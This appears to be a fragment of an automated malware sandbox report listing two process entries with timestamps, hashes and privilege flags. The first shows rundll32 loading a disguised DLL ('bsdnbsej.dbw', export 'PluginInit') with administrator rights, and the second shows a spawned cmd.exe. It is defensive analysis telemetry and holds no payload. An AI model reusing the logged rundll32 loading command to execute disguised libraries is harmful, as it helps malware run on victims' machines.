
                                                                  Start time:01:13:17
                                                                  Start date:04/05/2021
                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:rundll32 ..\bsdnbsej.dbw,PluginInit
                                                                  Imagebase:0xe80000
                                                                  File size:61952 bytes
                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: cmd.exe PID: 4928 Parent PID: 4744

                                                                  General

                                                                  Start time:01:14:22
                                                                  Start date:04/05/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\cmd.exe
                                                                  Imagebase:0x11d0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >